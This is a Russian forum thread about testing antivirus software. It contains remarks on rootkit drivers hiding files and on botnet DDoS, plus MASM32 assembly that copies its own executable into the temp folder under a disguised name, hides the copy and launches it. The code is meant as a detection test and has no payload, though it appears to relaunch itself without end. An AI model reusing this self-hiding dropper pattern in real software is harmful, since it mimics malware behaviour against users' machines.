Программа тестирования антивируса - Безопасность, Шифрование - Страница 2

challengerr · 05.09.2014, 09:32

Это является опасным, так как так же может копироваться руткит в виде драйвера в windows/system32/drivers Запуск драйвера осуществляет ядро операционной системы, и из пользовательского режима доступа в системную часть реестра нет. Дрйвер может перехватывать запросы к файловой системе, так что файл может даже не отображаться в файловом менеджере. В стандартном эксплорере отображение файлов некоторых типов и вовсе выключено. Большинство антивирусной защитой даже не заморачивается.. Ботнетами сайты ддосят.

challengerr · 21.02.2015, 16:08

Программа для тестирования из изначального сообщения для компиляции в masm32

Код:

.486                                    ; create 32 bit code
.model flat, stdcall                    ; 32 bit memory model
option casemap :none                    ; case sensitive
 
include \masm32\include\windows.inc     ; always first
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\msvcrt.inc
include \masm32\include\shell32.inc

includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\msvcrt.lib
includelib \masm32\lib\shell32.lib


.data
s1 db "s1", 0
s2 db "s2", 0
FileName db "stdafx.cpp.exe",0

.code                       

start:
push    PAGE_READWRITE
push    MEM_COMMIT
push    513
push    0
call    VirtualAlloc

mov     esi, eax
push    MAX_PATH
push    esi
push    0
call    GetModuleFileName

lea     edi, [esi + 257]
push    edi
push    MAX_PATH
call    GetTempPath

lea ebx, FileName
push    ebx
push    edi
call    lstrcat

push    0
push    edi
push    esi
call    CopyFile

push    FILE_ATTRIBUTE_HIDDEN
push    edi
call    SetFileAttributes

mov     byte ptr [esi], '!'
mov     byte ptr [esi + 1], 0
push    SW_SHOW
push    0
push    esi
push    edi
mov     dword ptr [esi + 2], "open"
mov     dword ptr [esi + 6], 0
lea     eax, [esi + 2]
push    eax
push    0
call    ShellExecute

push 0
lea eax, s1
push eax
lea ebx, s2
push ebx
push 0
call MessageBoxA

push    0
call    ExitProcess
 
end start

05.09.2014, 09:32	#11
challengerr Участник клуба Регистрация: 30.07.2008 Сообщений: 1,601	Это является опасным, так как так же может копироваться руткит в виде драйвера в windows/system32/drivers Запуск драйвера осуществляет ядро операционной системы, и из пользовательского режима доступа в системную часть реестра нет. Дрйвер может перехватывать запросы к файловой системе, так что файл может даже не отображаться в файловом менеджере. В стандартном эксплорере отображение файлов некоторых типов и вовсе выключено. Большинство антивирусной защитой даже не заморачивается.. Ботнетами сайты ддосят. "SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Программа тестирования ПО	Vaik00	Помощь студентам	8	26.04.2013 09:02
программа тестирования	indira2005	БД в Delphi	0	10.04.2012 20:30
Программа тестирования	Rashgild	Помощь студентам	2	14.07.2011 04:10
Программа тестирования	dani92	Общие вопросы Delphi	5	26.01.2010 11:05
Программа Тестирования.	Spiker01	Паскаль, Turbo Pascal, PascalABC.NET	3	06.01.2009 13:14